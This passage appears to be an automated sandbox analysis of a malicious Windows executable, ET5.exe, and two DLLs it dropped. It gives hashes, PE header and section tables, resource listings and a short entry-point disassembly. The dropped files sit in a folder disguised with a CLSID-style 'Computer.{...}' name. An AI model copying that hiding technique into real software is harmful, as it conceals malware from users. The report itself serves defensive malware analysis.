                  SHA-512:74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):129536
                  Entropy (8bit):6.2852879161990645
                  Encrypted:false
                  SSDEEP:1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
                  MD5:88E6178B0CD434C8D14710355E78E691
                  SHA1:F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
                  SHA-256:7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
                  SHA-512:C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.<..........Y.........,...................................../*....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text....:.......<..................`..`.data........P.......@..............@....rdata.......`.......B..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................
                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):6.236071662185895
                  Encrypted:false
                  SSDEEP:1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
                  MD5:CE579A1BDCB9763DAFEBF01AD29F918C
                  SHA1:F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
                  SHA-256:0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
                  SHA-512:EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y.........?..............................0......Uu....`... .........................................^.......................$............ ..l........................... v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                  Entropy (8bit):6.136682788930128
                  TrID:
                  • Win64 Executable GUI (202006/5) 92.64%
                  • Win64 Executable (generic) (12005/4) 5.51%
                  • Generic Win/DOS Executable (2004/3) 0.92%
                  • DOS Executable Generic (2002/1) 0.92%
                  • VXD Driver (31/22) 0.01%
                  File name:ET5.exe
                  File size:17'157'120 bytes
                  MD5:98c7ec9eb9c760e176a78a01bcb9f91c
                  SHA1:f88a8f1c1be4d07dafb27c65d36217eea4125020
                  SHA256:e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4
                  SHA512:cfe01247d0c9317e2ad6a0813b440fe096314cc17a53c736054d64ab2df00596ff8a927c2b3e43953ff023ad9ba32b6cd7c69de09dea2b62ace488b35ab89694
                  SSDEEP:98304:H1ZlHoeoVRfsVhKgr4oC+64469EGG1vGP8PHHsfNOIGdQI:V7oeoTfsVoy4oC+6MEGC88Cp
                  TLSH:6E074BBB77A59168C16DC13BC0638F00E93370B94B37C2E757A9066C9E629C45E3EB25
                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................
                  Icon Hash:6ab06e9aaaba8e50
                  Entrypoint:0x1033840
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                  DLL Characteristics:
                  Time Stamp:0x6751C478 [Thu Dec 5 15:19:20 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:2
                  File Version Major:5
                  File Version Minor:2
                  Subsystem Version Major:5
                  Subsystem Version Minor:2
                  Import Hash:4f8fac411df99d6d54fbaf68fa03582e
                  Instruction
                  push ebp
                  dec eax
                  sub esp, 20h
                  dec eax
                  mov ebp, esp
                  nop
                  dec eax
                  lea ecx, dword ptr [FFFE53D8h]
                  call 00007FDBFF8DFD70h
                  dec eax
                  mov eax, dword ptr [000F5894h]
                  dec eax
                  mov ecx, dword ptr [eax]
                  call 00007FDBFFC12FC1h
                  dec eax
                  mov eax, dword ptr [000F5885h]
                  dec eax
                  mov ecx, dword ptr [eax]
                  mov dl, 01h
                  call 00007FDBFFC15C70h
                  dec eax
                  mov eax, dword ptr [000F5874h]
                  dec eax
                  mov ecx, dword ptr [eax]
                  dec eax
                  mov edx, dword ptr [FFFE4D32h]
                  dec esp
                  mov eax, dword ptr [000F617Bh]
                  call 00007FDBFFC12FC3h
                  dec eax
                  mov eax, dword ptr [000F5857h]
                  dec eax
                  mov ecx, dword ptr [eax]
                  call 00007FDBFFC131D4h
                  call 00007FDBFF8D735Fh
                  jmp 00007FDC004FAD5Ah
                  nop
                  nop
                  call 00007FDBFF8D7556h
                  nop
                  dec eax
                  lea esp, dword ptr [ebp+20h]
                  pop ebp
                  ret
                  dec eax
                  nop
                  dec eax
                  lea eax, dword ptr [00000000h+eax]
                  dec eax
                  sub esp, 28h
                  call 00007FDBFF8D6AECh
                  dec eax
                  add esp, 28h
                  ret
                  int3
                  int3
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0xd5b000 | 0x9a | .edata
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd4b000 | 0x5c50 | .idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe98000 | 0x1eb200 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe00000 | 0x97e9c | .pdata
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd5e000 | 0xa1634 | .reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0xd5d000 | 0x28 | .rdata
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0xd4c7d0 | 0x15c8 | .idata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xd51000 | 0x91e8 | .didata
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  .text | 0x1000 | 0xc328d0 | 0xc32a00 | 1c23f6b18135b313a222b4993438dfc6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .data | 0xc34000 | 0xf5f18 | 0xf6000 | 57707d915d69e10db879945d98d9db32 | False | 0.2419850419207317 | data | 4.98697570722652 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .bss | 0xd2a000 | 0x20f4c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata | 0xd4b000 | 0x5c50 | 0x5e00 | 56beeeb7b323f48623a0b2e64e062a65 | False | 0.2416057180851064 | data | 4.389693246152294 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .didata | 0xd51000 | 0x91e8 | 0x9200 | 1fcabe78736cfaca95cba9423ec83403 | False | 0.1723030821917808 | data | 3.9804048481701213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .edata | 0xd5b000 | 0x9a | 0x200 | 0538b0a5f71cff2c330ccafbe5b58c1d | False | 0.2578125 | data | 1.9208874100491482 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .tls | 0xd5c000 | 0x1f0 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rdata | 0xd5d000 | 0x6d | 0x200 | cb2fd71666686575f15f2e428be251f9 | False | 0.197265625 | data | 1.454281212366734 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc | 0xd5e000 | 0xa1634 | 0xa1800 | ef1d8db22b07b9fa7850e81a434b0eba | False | 0.4475755248645511 | data | 6.451176293048843 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  .pdata | 0xe00000 | 0x97e9c | 0x98000 | 99a369a6362e36d60c0e9f97b2d9f20a | False | 0.4990475303248355 | data | 6.551197240780607 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc | 0xe98000 | 0x1eb200 | 0x1eb200 | 824df28f30254afbfd08e4cc191a402a | False | 0.3454938438533978 | data | 6.741958978664275 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                  RT_CURSOR | 0xe9cea4 | 0x134 | data | English | United States | 0.38636363636363635
                  RT_CURSOR | 0xe9cfd8 | 0x134 | data | English | United States | 0.4642857142857143
                  RT_CURSOR | 0xe9d10c | 0x134 | data | English | United States | 0.4805194805194805
                  RT_CURSOR | 0xe9d240 | 0x134 | data | English | United States | 0.38311688311688313
                  RT_CURSOR | 0xe9d374 | 0x134 | data | English | United States | 0.36038961038961037
                  RT_CURSOR | 0xe9d4a8 | 0x134 | data | English | United States | 0.4090909090909091
                  RT_CURSOR | 0xe9d5dc | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
                  RT_CURSOR | 0xe9d710 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
                  RT_BITMAP | 0xe9d844 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
                  RT_BITMAP | 0xe9da14 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
                  RT_BITMAP | 0xe9dbf8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
                  RT_BITMAP | 0xe9ddc8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
                  RT_BITMAP | 0xe9df98 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
                  RT_BITMAP | 0xe9e168 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
                  RT_BITMAP | 0xe9e338 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
                  RT_BITMAP | 0xe9e508 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
                  RT_BITMAP | 0xe9e6d8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
                  RT_BITMAP | 0xe9e8a8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
                  RT_BITMAP | 0xe9ea78 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.5208333333333334
                  RT_BITMAP | 0xe9eb38 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.42857142857142855
                  RT_BITMAP | 0xe9ec18 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.4955357142857143
                  RT_BITMAP | 0xe9ecf8 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.38392857142857145
                  RT_BITMAP | 0xe9edd8 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.4947916666666667
                  RT_BITMAP | 0xe9ee98 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.484375
                  RT_BITMAP | 0xe9ef58 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.42410714285714285
                  RT_BITMAP | 0xe9f038 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.5104166666666666
                  RT_BITMAP | 0xe9f0f8 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.5
                  RT_BITMAP | 0xe9f1d8 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
                  RT_BITMAP | 0xe9f2c0 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.4895833333333333
                  RT_BITMAP | 0xe9f380 | 0x188 | Device independent bitmap graphic, 24 x 24 x 4, image size 288 | English | United States | 0.34438775510204084
                  RT_BITMAP | 0xe9f508 | 0x188 | Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colors | English | United States | 0.45918367346938777
                  RT_BITMAP | 0xe9f690 | 0x188 | Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colors | English | United States | 0.30357142857142855
                  RT_BITMAP | 0xe9f818 | 0x188 | Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colors | English | United States | 0.3392857142857143
                  RT_BITMAP | 0xe9f9a0 | 0x668 | Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colors | English | United States | 0.3829268292682927
                  RT_BITMAP | 0xea0008 | 0x668 | Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colors | English | United States | 0.39146341463414636
                  RT_BITMAP | 0xea0670 | 0x668 | Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colors | English | United States | 0.3853658536585366
                  RT_BITMAP | 0xea0cd8 | 0x188 | Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colors | English | United States | 0.42857142857142855
                  RT_BITMAP | 0xea0e60 | 0x668 | Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colors | English | United States | 0.39207317073170733
                  RT_BITMAP | 0xea14c8 | 0x110 | Device independent bitmap graphic, 24 x 14 x 4, image size 168 | English | United States | 0.40808823529411764
                  RT_BITMAP | 0xea15d8 | 0x110 | Device independent bitmap graphic, 24 x 14 x 4, image size 168 | English | United States | 0.4117647058823529
                  RT_BITMAP | 0xea16e8 | 0x70 | Device independent bitmap graphic, 16 x 16 x 1, image size 64 | English | United States | 0.3125
                  RT_BITMAP | 0xea1758 | 0x70 | Device independent bitmap graphic, 16 x 16 x 1, image size 64 | English | United States | 0.41964285714285715
                  RT_BITMAP | 0xea17c8 | 0x70 | Device independent bitmap graphic, 16 x 16 x 1, image size 64 | English | United States | 0.3482142857142857
                  RT_BITMAP | 0xea1838 | 0x70 | Device independent bitmap graphic, 16 x 16 x 1, image size 64 | English | United States | 0.38392857142857145
                  RT_BITMAP | 0xea18a8 | 0x70 | Device independent bitmap graphic, 16 x 16 x 1, image size 64 | English | United States | 0.3392857142857143
                  RT_BITMAP | 0xea1918 | 0x70 | Device independent bitmap graphic, 16 x 16 x 1, image size 64 | English | United States | 0.32142857142857145
                  RT_BITMAP | 0xea1988 | 0x70 | Device independent bitmap graphic, 16 x 16 x 1, image size 64 | English | United States | 0.36607142857142855
                  RT_BITMAP | 0xea19f8 | 0x70 | Device independent bitmap graphic, 16 x 16 x 1, image size 64 | English | United States | 0.33035714285714285
                  RT_BITMAP | 0xea1a68 | 0x70 | Device independent bitmap graphic, 16 x 16 x 1, image size 64 | English | United States | 0.41964285714285715
                  RT_BITMAP | 0xea1ad8 | 0x70 | Device independent bitmap graphic, 16 x 16 x 1, image size 64 | English | United States | 0.30357142857142855
                  RT_BITMAP | 0xea1b48 | 0x70 | Device independent bitmap graphic, 16 x 16 x 1, image size 64 | English | United States | 0.33035714285714285
                  RT_BITMAP | 0xea1bb8 | 0x70 | Device independent bitmap graphic, 16 x 16 x 1, image size 64 | English | United States | 0.41964285714285715
                  RT_BITMAP | 0xea1c28 | 0x138 | Device independent bitmap graphic, 28 x 13 x 4, image size 208 | English | United States | 0.41025641025641024
                  RT_BITMAP | 0xea1d60 | 0x138 | Device independent bitmap graphic, 28 x 13 x 4, image size 208 | English | United States | 0.27564102564102566
                  RT_BITMAP | 0xea1e98 | 0x138 | Device independent bitmap graphic, 28 x 13 x 4, image size 208 | English | United States | 0.3685897435897436
                  RT_BITMAP | 0xea1fd0 | 0x138 | Device independent bitmap graphic, 28 x 13 x 4, image size 208 | English | United States | 0.3685897435897436
                  RT_BITMAP | 0xea2108 | 0x138 | Device independent bitmap graphic, 28 x 13 x 4, image size 208 | English | United States | 0.34294871794871795
                  RT_BITMAP | 0xea2240 | 0x138 | Device independent bitmap graphic, 28 x 13 x 4, image size 208 | English | United States | 0.3717948717948718
                  RT_BITMAP | 0xea2378 | 0x104 | Device independent bitmap graphic, 20 x 13 x 4, image size 156 | English | United States | 0.5038461538461538
                  RT_BITMAP | 0xea247c | 0x138 | Device independent bitmap graphic, 28 x 13 x 4, image size 208 | English | United States | 0.4326923076923077
                  RT_BITMAP | 0xea25b4 | 0x104 | Device independent bitmap graphic, 20 x 13 x 4, image size 156 | English | United States | 0.5153846153846153
                  RT_BITMAP | 0xea26b8 | 0x188 | Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colors | English | United States | 0.4107142857142857
                  RT_BITMAP | 0xea2840 | 0x188 | Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colors | English | United States | 0.3239795918367347
                  RT_BITMAP | 0xea29c8 | 0x188 | Device independent bitmap graphic, 24 x 24 x 4, image size 288 | English | United States | 0.31887755102040816
                  RT_BITMAP | 0xea2b50 | 0x188 | Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colors | English | United States | 0.30612244897959184
                  RT_BITMAP | 0xea2cd8 | 0x188 | Device independent bitmap graphic, 24 x 24 x 4, image size 288 | English | United States | 0.32142857142857145
                  RT_BITMAP | 0xea2e60 | 0x668 | Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colors | English | United States | 0.35548780487804876
                  RT_BITMAP | 0xea34c8 | 0x188 | Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colors | English | United States | 0.375
                  RT_BITMAP | 0xea3650 | 0x668 | Device independent bitmap graphic, 24 x 24 x 8, image size 576 | English | United States | 0.44939024390243903
                  RT_BITMAP | 0xea3cb8 | 0x188 | Device independent bitmap graphic, 24 x 24 x 4, image size 288, 16 important colors | English | United States | 0.3826530612244898
                  RT_BITMAP | 0xea3e40 | 0x668 | Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colors | English | United States | 0.3853658536585366
                  RT_BITMAP | 0xea44a8 | 0x668 | Device independent bitmap graphic, 24 x 24 x 8, image size 576, 256 important colors | English | United States | 0.43902439024390244
                  RT_BITMAP | 0xea4b10 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.3794642857142857
                  RT_ICON | 0xea4bf0 | 0x4c28 | Device independent bitmap graphic, 128 x 256 x 8, image size 0 |  |  | 0.20460607304062373
                  RT_ICON | 0xea9818 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 |  |  | 0.4031791907514451
                  RT_ICON | 0xea9d80 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 |  |  | 0.6814079422382672
                  RT_ICON | 0xeaa628 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 |  |  | 0.517590618336887
                  RT_ICON | 0xeab4d0 | 0x5c70 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |  |  | 0.9795892494929006
                  RT_DIALOG | 0xeb1140 | 0x52 | data |  |  | 0.7682926829268293
                  RT_DIALOG | 0xeb1194 | 0x52 | data |  |  | 0.7560975609756098
                  RT_STRING | 0xeb11e8 | 0x80 | data |  |  | 0.6171875
                  RT_STRING | 0xeb1268 | 0x3d4 | data |  |  | 0.4173469387755102
                  RT_STRING | 0xeb163c | 0x4d4 | data |  |  | 0.31957928802589
                  RT_STRING | 0xeb1b10 | 0x450 | data |  |  | 0.3269927536231884
                  RT_STRING | 0xeb1f60 | 0x2f0 | data |  |  | 0.42686170212765956
                  RT_STRING | 0xeb2250 | 0x128 | data |  |  | 0.6013513513513513
                  RT_STRING | 0xeb2378 | 0x280 | data |  |  | 0.4921875
                  RT_STRING | 0xeb25f8 | 0x4c0 | data |  |  | 0.35855263157894735
                  RT_STRING | 0xeb2ab8 | 0x560 | data |  |  | 0.3633720930232558
                  RT_STRING | 0xeb3018 | 0x9bc | data |  |  | 0.28892455858747995
                  RT_STRING | 0xeb39d4 | 0x854 | data |  |  | 0.2687617260787992
                  RT_STRING | 0xeb4228 | 0x344 | data |  |  | 0.4090909090909091
                  RT_STRING | 0xeb456c | 0x460 | data |  |  | 0.36339285714285713
                  RT_STRING | 0xeb49cc | 0x448 | data |  |  | 0.3476277372262774
                  RT_STRING | 0xeb4e14 | 0x448 | data |  |  | 0.2937956204379562
                  RT_STRING | 0xeb525c | 0x544 | data |  |  | 0.3954005934718101
                  RT_STRING | 0xeb57a0 | 0x274 | data |  |  | 0.4697452229299363
                  RT_STRING | 0xeb5a14 | 0x380 | data |  |  | 0.2622767857142857
                  RT_STRING | 0xeb5d94 | 0x334 | AmigaOS bitmap font "x", fc_YSize 30208, 17664 elements, 2nd " ", 3rd "i" |  |  | 0.424390243902439
                  RT_STRING | 0xeb60c8 | 0x45c | data |  |  | 0.4229390681003584
                  RT_STRING | 0xeb6524 | 0x304 | data |  |  | 0.4365284974093264
                  RT_STRING | 0xeb6828 | 0x3b0 | data |  |  | 0.3834745762711864
                  RT_STRING | 0xeb6bd8 | 0x274 | data |  |  | 0.5127388535031847
                  RT_STRING | 0xeb6e4c | 0x2dc | data |  |  | 0.4562841530054645
                  RT_STRING | 0xeb7128 | 0x5ac | data |  |  | 0.3622589531680441
                  RT_STRING | 0xeb76d4 | 0x360 | data |  |  | 0.3784722222222222
                  RT_STRING | 0xeb7a34 | 0x334 | data |  |  | 0.424390243902439
                  RT_STRING | 0xeb7d68 | 0x358 | data |  |  | 0.39602803738317754
                  RT_STRING | 0xeb80c0 | 0x394 | data |  |  | 0.3307860262008734
                  RT_STRING | 0xeb8454 | 0x3e8 | data |  |  | 0.446
                  RT_STRING | 0xeb883c | 0x520 | data |  |  | 0.3445121951219512
                  RT_STRING | 0xeb8d5c | 0x3dc | data |  |  | 0.3248987854251012
                  RT_STRING | 0xeb9138 | 0x2b8 | data |  |  | 0.4870689655172414
                  RT_STRING | 0xeb93f0 | 0x36c | data |  |  | 0.4337899543378995
                  RT_STRING | 0xeb975c | 0x258 | data |  |  | 0.48833333333333334
                  RT_STRING | 0xeb99b4 | 0xbc | data |  |  | 0.675531914893617
                  RT_STRING | 0xeb9a70 | 0x1f8 | data |  |  | 0.4623015873015873
                  RT_STRING | 0xeb9c68 | 0x198 | data |  |  | 0.5588235294117647
                  RT_STRING | 0xeb9e00 | 0x378 | data |  |  | 0.4099099099099099
                  RT_STRING | 0xeba178 | 0x400 | data |  |  | 0.3642578125
                  RT_STRING | 0xeba578 | 0x428 | data |  |  | 0.3768796992481203
                  RT_STRING | 0xeba9a0 | 0x53c | data |  |  | 0.32164179104477614
                  RT_STRING | 0xebaedc | 0x280 | data |  |  | 0.3265625
                  RT_STRING | 0xebb15c | 0x408 | data |  |  | 0.4001937984496124
                  RT_STRING | 0xebb564 | 0x6d0 | data |  |  | 0.3256880733944954
                  RT_STRING | 0xebbc34 | 0x468 | data |  |  | 0.3333333333333333
                  RT_STRING | 0xebc09c | 0x330 | data |  |  | 0.3909313725490196
                  RT_STRING | 0xebc3cc | 0x35c | data |  |  | 0.3755813953488372
                  RT_STRING | 0xebc728 | 0x3c4 | data |  |  | 0.36721991701244816
                  RT_STRING | 0xebcaec | 0x3fc | data |  |  | 0.3764705882352941
                  RT_STRING | 0xebcee8 | 0xd0 | data |  |  | 0.5288461538461539
                  RT_STRING | 0xebcfb8 | 0xb8 | data |  |  | 0.6467391304347826
                  RT_STRING | 0xebd070 | 0x2c0 | data |  |  | 0.46732954545454547
                  RT_STRING | 0xebd330 | 0x434 | data |  |  | 0.3308550185873606
                  RT_STRING | 0xebd764 | 0x360 | data |  |  | 0.38425925925925924
                  RT_STRING | 0xebdac4 | 0x2ec | data |  |  | 0.37566844919786097
                  RT_STRING | 0xebddb0 | 0x31c | data |  |  | 0.34296482412060303
                  RT_RCDATA | 0xebe0cc | 0x627e | JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, datetime=2010:05:11 20:59:59], baseline, precision 8, 256x256, components 3 | English | United States | 0.9922265408106608
                  RT_RCDATA | 0xec434c | 0x10 | data |  |  | 1.5
                  RT_RCDATA | 0xec435c | 0x1536 | MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel | English | United States | 0.6550644567219153
                  RT_RCDATA | 0xec5894 | 0x359 | GIF image data, version 89a, 16 x 16 | English | United States | 0.15635939323220538
                  RT_RCDATA | 0xec5bf0 | 0x378 | GIF image data, version 89a, 21 x 21 | English | United States | 0.5529279279279279
                  RT_RCDATA | 0xec5f68 | 0x12c | GIF image data, version 89a, 10 x 12 | English | United States | 0.83
                  RT_RCDATA | 0xec6094 | 0x129 | GIF image data, version 89a, 10 x 12 | English | United States | 0.7575757575757576
                  RT_RCDATA | 0xec61c0 | 0x4c8 | GIF image data, version 89a, 24 x 24 | English | United States | 0.6282679738562091
                  RT_RCDATA | 0xec6688 | 0x4b5 | GIF image data, version 89a, 24 x 24 | English | United States | 0.5526970954356847
                  RT_RCDATA | 0xec6b40 | 0x42e | GIF image data, version 89a, 24 x 24 | English | United States | 0.5112149532710281
                  RT_RCDATA | 0xec6f70 | 0x42e | GIF image data, version 89a, 24 x 24 | English | United States | 0.4766355140186916
                  RT_RCDATA | 0xec73a0 | 0x432 | GIF image data, version 89a, 24 x 24 | English | United States | 0.5027932960893855
                  RT_RCDATA | 0xec77d4 | 0x434 | GIF image data, version 89a, 24 x 24 | English | United States | 0.4758364312267658
                  RT_RCDATA | 0xec7c08 | 0x4da | GIF image data, version 89a, 24 x 24 | English | United States | 0.6191626409017713
                  RT_RCDATA | 0xec80e4 | 0x4c1 | GIF image data, version 89a, 24 x 24 | English | United States | 0.5825801150369762
                  RT_RCDATA | 0xec85a8 | 0x449 | GIF image data, version 89a, 24 x 24 | English | United States | 0.5077484047402006
                  RT_RCDATA | 0xec89f4 | 0x455 | GIF image data, version 89a, 24 x 24 | English | United States | 0.5067628494138864
                  RT_RCDATA | 0xec8e4c | 0x4ce | GIF image data, version 89a, 24 x 24 | English | United States | 0.6699186991869919
                  RT_RCDATA | 0xec931c | 0x4b9 | GIF image data, version 89a, 24 x 24 | English | United States | 0.5665839536807279
                  RT_RCDATA | 0xec97d8 | 0x32e | GIF image data, version 89a, 24 x 24 | English | United States | 0.9582309582309583
                  RT_RCDATA | 0xec9b08 | 0x30e | GIF image data, version 89a, 24 x 24 | English | United States | 0.8491048593350383
                  RT_RCDATA | 0xec9e18 | 0x444 | GIF image data, version 89a, 24 x 24 | English | United States | 0.5265567765567766
                  RT_RCDATA | 0xeca25c | 0x44f | GIF image data, version 89a, 24 x 24 | English | United States | 0.4877606527651859
                  RT_RCDATA | 0xeca6ac | 0x4b5 | GIF image data, version 89a, 24 x 24 | English | United States | 0.6182572614107884
                  RT_RCDATA | 0xecab64 | 0x4ab | GIF image data, version 89a, 24 x 24 | English | United States | 0.5581589958158996
